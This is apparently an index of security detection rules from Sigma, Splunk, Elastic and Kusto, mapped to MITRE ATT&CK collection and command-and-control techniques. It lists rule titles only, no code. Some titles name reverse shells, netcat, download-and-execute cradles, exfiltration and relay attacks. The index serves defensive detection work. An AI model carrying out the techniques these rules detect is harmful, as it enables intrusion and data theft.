- Elastic Exporting Exchange Mailbox via PowerShell production
- Sigma Hacktool Ruler test
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
- Splunk Mailsniper Invoke functions production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Local Email Collection test
- Elastic Suspicious Inter-Process Communication via Outlook production
Email Collection: Local Email Collection T1114.001 8 rules
- Elastic Accessing Outlook Data Files production
- Splunk Email files written outside of the Outlook directory experimental
- Splunk Exchange New Export Request (PowerShell)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Splunk Mailsniper Invoke functions production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Local Email Collection test
- Elastic Suspicious Inter-Process Communication via Outlook production
Email Collection: Remote Email Collection T1114.002 3 rules
- Splunk Exchange New Export Request (PowerShell)
- Elastic Exporting Exchange Mailbox via PowerShell production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
Email Collection: Email Forwarding Rule T1114.003 2 rules
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
Clipboard Data T1115 9 rules
- Sigma Clipboard Data Collection Via Pbpaste test
- Sigma Data Copied To Clipboard Via Clip.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get Clipboard test
- Sigma PowerShell Get-Clipboard Cmdlet Via CLI test
- Splunk Suspicious PowerShell Clipboard Activity (PowerShell)
- Splunk Suspicious PowerShell Clipboard Activity (Sysmon)
- Splunk Suspicious PowerShell Clipboard Activity (Windows Event Log)
- Splunk Windows ClipBoard Data via Get-ClipBoard production
Automated Collection T1119 16 rules
- Kusto ADWS Connection from Process Injection Target
- Kusto ADWS Connection from Unexpected Binary
- Sigma Automated Collection Command PowerShell test
- Sigma Automated Collection Command Prompt test
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto Large number of AD objects accessed by user
- Sigma Recon Information for Export with Command Prompt test
- Sigma Recon Information for Export with PowerShell test
- Sigma Shai-Hulud Malicious GitHub Workflow Creation experimental
- Splunk Windows File Collection Via Copy Utilities production
- Splunk Windows Process Accessing Windows Recall Directory production
Audio Capture T1123 4 rules
- Sigma Audio Capture via PowerShell test
- Sigma Audio Capture via SoundRecorder test
- Sigma Processes Accessing the Microphone and Webcam test
- Sigma Suspicious Camera and Microphone Access test
Video Capture T1125 4 rules
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Sigma Suspicious Camera and Microphone Access test
Browser Session Hijacking T1185 11 rules
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma Browser Started with Remote Debugging test
- Splunk Browser Started with Remote Debugging - Windows (PowerShell)
- Splunk Browser Started with Remote Debugging - Windows (Sysmon)
- Splunk Browser Started with Remote Debugging - Windows (Windows Event Log)
- Sigma Potential Data Stealing Via Chromium Headless Debugging test
- Splunk Windows Browser Process Launched with Unusual Flags production
- Splunk Windows Chrome Auto-Update Disabled via Registry production
- Splunk Windows Chrome Enable Extension Loading via Command-Line production
- Splunk Windows Chrome Extension Allowed Registry Modification production
- Splunk Windows Chromium Process Loaded Extension via Command-Line production
Data from Information Repositories T1213 2 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Elastic Potential Veeam Credential Access Command production
Adversary-in-the-Middle T1557 37 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Elastic Creation or Modification of Root Certificate production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Elastic DNS Global Query Block List Modified or Disabled production
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma ISATAP Router Address Was Set experimental
- Sigma Local Privilege Escalation Indicator TabTip test
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Kusto NTLM Relay Attack
- Elastic Potential ADIDNS Poisoning via Wildcard Record Creation production
- Elastic Potential Computer Account NTLM Relay Activity production
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Local NTLM Relay via HTTP production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Potential WPAD Spoofing via DNS Record Creation production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Elastic Service Creation via Local Kerberos Authentication production
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: Name Resolution Poisoning and SMB Relay T1557.001 25 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma Local Privilege Escalation Indicator TabTip test
- Kusto NTLM Relay Attack
- Elastic Potential Computer Account NTLM Relay Activity production
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: DHCP Spoofing T1557.003 1 rule
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
Archive Collected Data T1560 34 rules
- Splunk 7zip CommandLine To SMB Share Path production
- Sigma 7Zip Compressing Dump Files test
- Splunk Anomalous usage of 7zip production
- Sigma APT31 Judgement Panda Activity test
- Sigma Compress Data and Lock With Password for Exfiltration With 7-ZIP test
- Sigma Compress Data and Lock With Password for Exfiltration With WINZIP test
- Sigma Compress-Archive Cmdlet Execution test
- Sigma Compressed File Creation Via Tar.EXE test
- Sigma Compressed File Extraction Via Tar.EXE test
- Elastic Compression DLL Loaded by Unusual Process production
- Sigma Conti NTDS Exfiltration Command test
- Splunk Detect Certipy File Modifications production
- Splunk Detect Renamed 7-Zip production
- Splunk Detect Renamed WinRAR production
- Elastic Encrypting Files with WinRar or 7z production
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Files Added To An Archive Using Rar.EXE test
- Splunk IcedID Exfiltrated Archived File Creation production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Splunk Native Archive Commands (PowerShell)
- Splunk Native Archive Commands (Sysmon)
- Splunk Native Archive Commands (Windows Event Log)
- Sigma Password Protected Compressed File Extraction Via 7Zip test
- Sigma Potentially Suspicious Compression Tool Parameters test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Rar Usage with Password and Compression Level test
- Sigma Suspicious Manipulation Of Default Accounts Via Net.EXE test
- Splunk Utility Archive Data (PowerShell)
- Splunk Utility Archive Data (Windows Event Log)
- Splunk Windows Archive Collected Data via Powershell production
- Splunk Windows Archive Collected Data via Rar production
- Splunk Windows Archived Collected Data In TEMP Folder production
- Sigma Winrar Compressing Dump Files test
- Sigma WinRAR Execution in Non-Standard Folder test
Archive Collected Data: Archive via Utility T1560.001 24 rules
- Splunk 7zip CommandLine To SMB Share Path production
- Sigma 7Zip Compressing Dump Files test
- Splunk Anomalous usage of 7zip production
- Sigma APT31 Judgement Panda Activity test
- Sigma Compress Data and Lock With Password for Exfiltration With 7-ZIP test
- Sigma Compress Data and Lock With Password for Exfiltration With WINZIP test
- Sigma Compressed File Creation Via Tar.EXE test
- Sigma Compressed File Extraction Via Tar.EXE test
- Splunk Detect Renamed 7-Zip production
- Splunk Detect Renamed WinRAR production
- Elastic Encrypting Files with WinRar or 7z production
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Files Added To An Archive Using Rar.EXE test
- Splunk IcedID Exfiltrated Archived File Creation production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma Password Protected Compressed File Extraction Via 7Zip test
- Sigma Potentially Suspicious Compression Tool Parameters test
- Sigma Rar Usage with Password and Compression Level test
- Sigma Suspicious Manipulation Of Default Accounts Via Net.EXE test
- Splunk Utility Archive Data (PowerShell)
- Splunk Utility Archive Data (Windows Event Log)
- Splunk Windows Archive Collected Data via Rar production
- Sigma Winrar Compressing Dump Files test
- Sigma WinRAR Execution in Non-Standard Folder test
Archive Collected Data: Archive via Library T1560.002 1 rule
- Elastic Compression DLL Loaded by Unusual Process production
Command & Control
Data Obfuscation T1001 5 rules
- Sigma ADSI-Cache File Creation By Uncommon Tool test
- Splunk Obfuscated Powershell Techniques (PowerShell)
- Sigma Suspicious LDAP-Attributes Used test
- Splunk Windows PowGoop Beacon Decoding production
- Splunk Windows Suspicious QEMU Execution production
Data Obfuscation: Protocol or Service Impersonation T1001.003 2 rules
- Sigma ADSI-Cache File Creation By Uncommon Tool test
- Sigma Suspicious LDAP-Attributes Used test
Fallback Channels T1008 9 rules
- Kusto Detect DNS queries reporting multiple errors from different clients - Static threshold based (ASIM DNS Solution) available
- Kusto Detect excessive NXDOMAIN DNS queries - Static threshold based (ASIM DNS Solution) available
- Kusto Excessive NXDOMAIN DNS Queries (ASIM DNS Schema)
- Sigma New Outlook Macro Created test
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Kusto Potential DGA(Domain Generation Algorithm) detected via Repetitive Failures - Static threshold based (ASIM DNS Solution) available
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Suspicious Outlook Macro Created test
- Splunk Windows Outlook Macro Security Modified production
Application Layer Protocol T1071 78 rules
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma Change User Agents with WebRequest test
- Sigma Cloudflared Tunnels Related DNS Requests test
- Splunk Command and Control Detection (Windows Event Log)
- Elastic Connection to Commonly Abused Web Services production
- Sigma Curl.EXE Execution With Custom UserAgent test
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Splunk DNS Kerberos Coercion production
- Sigma DNS Query by Finger Utility experimental
- Sigma DNS Query Request By QuickAssist.EXE experimental
- Sigma DNS Query To Common Malware Hosting and Shortener Services experimental
- Sigma DNS Query To Devtunnels Domain test
- Sigma DNS Query To Katz Stealer Domains experimental
- Sigma DNS Query To Visual Studio Code Tunnels Domain test
- Sigma DoT (DNS over TLS) activation (command) stable
- Sigma DoT (DNS over TLS) activation (PowerShell) experimental
- Sigma GALLIUM IOCs test
- Sigma Github Self-Hosted Runner Execution test
- Kusto Google Threat Intelligence - Threat Hunting Domain
- Kusto Google Threat Intelligence - Threat Hunting IP
- Sigma HackTool - SILENTTRINITY Stager DLL Load test
- Sigma HackTool - SILENTTRINITY Stager Execution test
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Elastic MsBuild Making Network Connections production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Network Connection Initiated via Finger.EXE experimental
- Elastic Network Connection via Compiled HTML File production
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Outbound Network Connection Initiated By Microsoft Dialer test
- Elastic Outlook Home Page Registry Modification production
- Kusto Potential beaconing activity (ASIM Network Session schema) available
- Elastic Potential Command and Control via Internet Explorer production
- Elastic Potential DNS Tunneling via NsLookup production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Sigma Potentially Suspicious Rundll32.EXE Execution of UDL File test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Renamed Visual Studio Code Tunnel Execution test
- Sigma Silence.EDA Detection test
- Sigma Suspicious Cobalt Strike DNS Beaconing - DNS Client test
- Sigma Suspicious Cobalt Strike DNS Beaconing - Sysmon test
- Elastic Suspicious Command Prompt Network Connection production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic System Public IP Discovery via DNS Query production
- Sigma Tunneling Tool Execution test
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Splunk Unusual HTTP Download (Sysmon)
- Elastic Unusual Network Connection via DllHost production
- Elastic Unusual Network Connection via RunDLL32 production
- Sigma Visual Studio Code Tunnel Execution test
- Splunk Visual Studio Code Tunnel Execution (Sysmon)
- Splunk Visual Studio Code Tunnel Execution (Windows Event Log)
- Sigma Visual Studio Code Tunnel Service Installation test
- Sigma Visual Studio Code Tunnel Shell Execution test
- Splunk Windows AI Platform DNS Query production
- Splunk Windows App Layer Protocol Qakbot NamedPipe production
- Splunk Windows App Layer Protocol Wermgr Connect To NamedPipe production
- Splunk Windows Application Layer Protocol RMS Radmin Tool Namedpipe production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows DNS Query Request by Telegram Bot API production
- Splunk Windows File Transfer Protocol In Non-Common Process Path production
- Splunk Windows FTP Exfiltration (PowerShell)
- Splunk Windows FTP Exfiltration (Sysmon)
- Splunk Windows FTP Exfiltration (Windows Event Log)
- Kusto Windows host username encoded in base64 web request
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Mail Protocol In Non-Common Process Path production
- Splunk Windows Multi hop Proxy TOR Website Query production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Visual Basic Commandline Compiler DNSQuery production
Application Layer Protocol: Web Protocols T1071.001 27 rules
- Sigma Change User Agents with WebRequest test
- Sigma Cloudflared Tunnels Related DNS Requests test
- Splunk Command and Control Detection (Windows Event Log)
- Elastic Connection to Commonly Abused Web Services production
- Sigma Curl.EXE Execution With Custom UserAgent test
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Sigma DNS Query Request By QuickAssist.EXE experimental
- Sigma DNS Query To Devtunnels Domain test
- Sigma DNS Query To Visual Studio Code Tunnels Domain test
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Outbound Network Connection Initiated By Microsoft Dialer test
- Elastic Outlook Home Page Registry Modification production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Renamed Visual Studio Code Tunnel Execution test
- Elastic Suspicious Execution from a WebDav Share production
- Sigma Tunneling Tool Execution test
- Splunk Unusual HTTP Download (Sysmon)
- Elastic Unusual Network Connection via RunDLL32 production
- Sigma Visual Studio Code Tunnel Execution test
- Splunk Visual Studio Code Tunnel Execution (Sysmon)
- Splunk Visual Studio Code Tunnel Execution (Windows Event Log)
- Sigma Visual Studio Code Tunnel Service Installation test
- Sigma Visual Studio Code Tunnel Shell Execution test
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Kusto Windows host username encoded in base64 web request
Application Layer Protocol: File Transfer Protocols T1071.002 6 rules
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Splunk Windows FTP Exfiltration (PowerShell)
- Splunk Windows FTP Exfiltration (Sysmon)
- Splunk Windows FTP Exfiltration (Windows Event Log)
Application Layer Protocol: Mail Protocols T1071.003 3 rules
- Splunk Windows File Transfer Protocol In Non-Common Process Path production
- Splunk Windows Mail Protocol In Non-Common Process Path production
- Splunk Windows Multi hop Proxy TOR Website Query production
Application Layer Protocol: DNS T1071.004 25 rules
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Splunk DNS Kerberos Coercion production
- Sigma DNS Query by Finger Utility experimental
- Sigma DNS Query To Common Malware Hosting and Shortener Services experimental
- Sigma DNS Query To Katz Stealer Domains experimental
- Sigma DoT (DNS over TLS) activation (command) stable
- Sigma DoT (DNS over TLS) activation (PowerShell) experimental
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Network Connection Initiated via Finger.EXE experimental
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Potential Command and Control via Internet Explorer production
- Elastic Potential DNS Tunneling via NsLookup production
- Sigma Silence.EDA Detection test
- Sigma Suspicious Cobalt Strike DNS Beaconing - DNS Client test
- Sigma Suspicious Cobalt Strike DNS Beaconing - Sysmon test
- Elastic System Public IP Discovery via DNS Query production
- Splunk Windows AI Platform DNS Query production
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows DNS Query Request by Telegram Bot API production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Visual Basic Commandline Compiler DNSQuery production
Proxy T1090 39 rules
- Sigma Cloudflared Portable Execution test
- Sigma Cloudflared Quick Tunnel Execution test
- Sigma Cloudflared Tunnel Connections Cleanup test
- Sigma Cloudflared Tunnel Execution test
- Sigma Communication To LocaltoNet Tunneling Service Initiated test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Sigma DNS Query Tor .Onion Address - Sysmon test
- Sigma HackTool - Htran/NATBypass Execution test
- Sigma HackTool - SharpChisel Execution test
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- YARA-L MITRE ATT&CK T1090 Port Proxy Forwarding CISA Report
- Sigma Network Communication Initiated To Portmap.IO Domain test
- Sigma New Port Forwarding Rule Added Via Netsh.EXE test
- Sigma New PortProxy Registry Entry Added test
- Splunk Ngrok Reverse Proxy on Network production
- Kusto Ngrok Reverse Proxy on Network (ASIM DNS Solution) available
- Sigma Ngrok Usage with Remote Desktop Service test
- Elastic Port Forwarding Rule Addition production
- Elastic Potential Protocol Tunneling via Cloudflared production
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potentially Suspicious Azure Front Door Connection test
- Sigma Potentially Suspicious Usage Of Qemu test
- Sigma PUA - Chisel Tunneling Tool Execution test
- Sigma PUA - Fast Reverse Proxy (FRP) Execution test
- Sigma PUA - NPS Tunneling Tool Execution test
- Sigma PUA- IOX Tunneling Tool Execution test
- Sigma Query Tor Onion Address - DNS Client test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma RDP Port Forwarding Rule Added Via Netsh.EXE test
- Sigma Renamed Cloudflared.EXE Execution test
- Sigma Suspicious TCP Tunnel Via PowerShell Script test
- Sigma Tor Client/Browser Execution test
- Splunk Windows Devtunnels Execution production
- Splunk Windows Devtunnels Image Loaded production
- Splunk Windows Ngrok Reverse Proxy Usage production
- Splunk Windows Proxy Via Netsh production
- Splunk Windows Proxy Via Registry production
- Splunk Windows TOR Client Execution production
Proxy: Internal Proxy T1090.001 9 rules
- Sigma Cloudflared Portable Execution test
- Sigma Cloudflared Quick Tunnel Execution test
- Sigma HackTool - SharpChisel Execution test
- Elastic Port Forwarding Rule Addition production
- Sigma PUA - Chisel Tunneling Tool Execution test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma Renamed Cloudflared.EXE Execution test
- Splunk Windows Proxy Via Netsh production
- Splunk Windows Proxy Via Registry production
Proxy: External Proxy T1090.002 4 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma Network Communication Initiated To Portmap.IO Domain test
- Elastic Potential Protocol Tunneling via Cloudflared production
- Sigma RDP over Reverse SSH Tunnel WFP test
Proxy: Multi-hop Proxy T1090.003 4 rules
- Sigma DNS Query Tor .Onion Address - Sysmon test
- Sigma Query Tor Onion Address - DNS Client test
- Sigma Tor Client/Browser Execution test
- Splunk Windows TOR Client Execution production
Non-Application Layer Protocol T1095 11 rules
- Splunk Command and Control Detection (Windows Event Log)
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Sigma Netcat The Powershell Version test
- Elastic Potential Command Shell via NetCat production
- Sigma PUA - Netcat Suspicious Execution test
- Splunk QEMU Network Tunneling - Windows (PowerShell)
- Splunk QEMU Network Tunneling - Windows (Sysmon)
- Splunk QEMU Network Tunneling - Windows (Windows Event Log)
- Splunk Tunneling Process Created (PowerShell)
- Splunk Tunneling Process Created (Sysmon)
- Splunk Tunneling Process Created (Windows Event Log)
Web Service T1102 21 rules
- Sigma Cloudflared Tunnel Connections Cleanup test
- Sigma Cloudflared Tunnel Execution test
- Sigma Communication To LocaltoNet Tunneling Service Initiated test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Sigma Github Self-Hosted Runner Execution test
- Sigma Network Connection Initiated To AzureWebsites.NET By Non-Browser Process test
- Sigma New Connection Initiated To Potential Dead Drop Resolver Domain test
- Splunk Ngrok Reverse Proxy on Network production
- Kusto Ngrok Reverse Proxy on Network (ASIM DNS Solution) available
- Splunk Potential Telegram API Request Via CommandLine production
- Sigma Potentially Suspicious Azure Front Door Connection test
- Sigma Potentially Suspicious Network Connection To Notion API test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Process Initiated Network Connection To Ngrok Domain test
- Sigma Suspicious Child Process Of Manage Engine ServiceDesk test
- Sigma Suspicious Non-Browser Network Communication With Google API experimental
- Sigma Suspicious Non-Browser Network Communication With Telegram API test
- Splunk Windows Abused Web Services production
- Splunk Windows DNS Query Request by Telegram Bot API production
- Splunk Windows Ngrok Reverse Proxy Usage production
Web Service: Bidirectional Communication T1102.002 6 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma Github Self-Hosted Runner Execution test
- Splunk Potential Telegram API Request Via CommandLine production
- Sigma Potentially Suspicious Azure Front Door Connection test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows DNS Query Request by Telegram Bot API production
Ingress Tool Transfer T1105 191 rules
- Sigma AppX Package Installation Attempts Via AppInstaller.EXE test
- Sigma Arbitrary File Download Via GfxDownloadWrapper.EXE test
- Sigma Axios NPM Compromise File Creation Indicators - Linux experimental
- Sigma Axios NPM Compromise File Creation Indicators - MacOS experimental
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Sigma Browser Execution In Headless Mode test
- Kusto C2-NamedPipe available
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Splunk Certutil File Download (PowerShell)
- Splunk Certutil File Download (Sysmon)
- Splunk Certutil File Download (Windows Event Log)
- Sigma Certutil payload download (command) experimental
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Sigma Curl Download And Execute Combination test
- Splunk Curl Execution with Percent Encoded URL production
- Sigma Curl.EXE Execution test
- Sigma DarkGate - Autoit3.EXE File Creation By Uncommon Process test
- Splunk Detect Certify Command Line Arguments production
- Splunk Download Files Using Telegram production
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Splunk Executable File Written to Disk (Sysmon)
- Splunk Executable File Written to Disk (Windows Event Log)
- Splunk Expand.exe Execution (PowerShell)
- Splunk Expand.exe Execution (Sysmon)
- Splunk Expand.exe Execution (Windows Event Log)
- Sigma File Download And Execution Via IEExec.EXE test
- Sigma File Download From Browser Process Via Inline URL test
- Sigma File Download From IP Based URL Via CertOC.EXE test
- Splunk File Download or Read to Pipe Execution production
- Sigma File Download Using Notepad++ GUP Utility test
- YARA-L File Download Using Notepad++ GUP Utility
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File Download via CertOC.EXE test
- Sigma File Download Via Curl.EXE test
- Sigma File Download Via Windows Defender MpCmpRun.EXE test
- YARA-L File Download Via Windows Defender MpCmpRun.EXE
- Sigma File Download with Headless Browser test
- Splunk File Executed from INetCache (Sysmon)
- Splunk File Executed from INetCache (Windows Event Log)
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Splunk Finger Execution (Sysmon)
- Splunk Finger Execution (Windows Event Log)
- Sigma Finger.EXE Execution test
- YARA-L Finger.EXE Execution
- Splunk Git Clone Repository (PowerShell)
- Splunk Git Submodule Cloned - Windows (Sysmon)
- Splunk Git Submodule Cloned - Windows (Windows Event Log)
- Sigma Greenbug Espionage Group Indicators test
- Sigma Import LDAP Data Interchange Format File Via Ldifde.EXE test
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Splunk Invoke-WebRequest Command (PowerShell)
- Splunk Invoke-WebRequest Command (Sysmon)
- Splunk Invoke-WebRequest Command (Windows Event Log)
- Sigma Legitimate Application Writing Files In Uncommon Location experimental
- Splunk Live Sysinternals Execution (Sysmon)
- Splunk Live Sysinternals Execution (Windows Event Log)
- Sigma Local Network Connection Initiated By Script Interpreter test
- Sigma Lolbas OneDriveStandaloneUpdater.exe Proxy Download test
- Splunk LOLBAS With Network Traffic production
- Splunk mshta.exe File Download (PowerShell)
- Splunk mshta.exe File Download (Sysmon)
- Splunk mshta.exe File Download (Windows Event Log)
- Sigma MsiExec Web Install test
- Sigma Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder test
- Sigma Network Connection Initiated By IMEWDBLD.EXE test
- Sigma Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location test
- Sigma Network Connection Initiated From Users\Public Folder test
- Elastic Network Connection via Certutil production
- Elastic Network Connection via MsXsl production
- Splunk Network Connection with Suspicious Folder (Sysmon)
- Splunk Network Connection with Suspicious Folder (Windows Event Log)
- Splunk ngen.exe File Download (PowerShell)
- Splunk ngen.exe File Download (Sysmon)
- Splunk ngen.exe File Download (Windows Event Log)
- Kusto Office Apps Launching Wscipt available
- Splunk Office Binary Download Remote File (Windows Event Log)
- Sigma Outbound Network Connection Initiated By Script Interpreter test
- Splunk Package installation (PowerShell)
- Splunk Package installation (Sysmon)
- Splunk Package installation (Windows Event Log)
- Sigma Pandemic Registry Key test
- Sigma Password Protected ZIP File Opened (Suspicious Filenames) test
- Sigma Payload downloaded via PowerShell
- Sigma Potential COM Objects Download Cradles Usage - Process Creation test
- Sigma Potential COM Objects Download Cradles Usage - PS Script test
- Sigma Potential Data Exfiltration Via Curl.EXE test
- Sigma Potential DLL File Download Via PowerShell Invoke-WebRequest test
- Sigma Potential Download/Upload Activity Using Type Command test
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Process Access experimental
- Elastic Potential File Download via a Headless Browser production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Elastic Potential Remote File Execution via MSIEXEC production
- Elastic Potential Remote Install via MsiExec production
- Sigma Potentially Suspicious File Creation by OpenEDR's ITSMService experimental
- Splunk PowerShell Download Activity (PowerShell)
- Sigma PowerShell Download Via Net.WebClient - PowerShell Classic test
- Splunk PowerShell DownloadFile_DownloadString (PowerShell)
- Splunk PowerShell DownloadFile_DownloadString (Sysmon)
- Splunk PowerShell DownloadFile_DownloadString (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Splunk PowerShell Script Block With URL Chain production
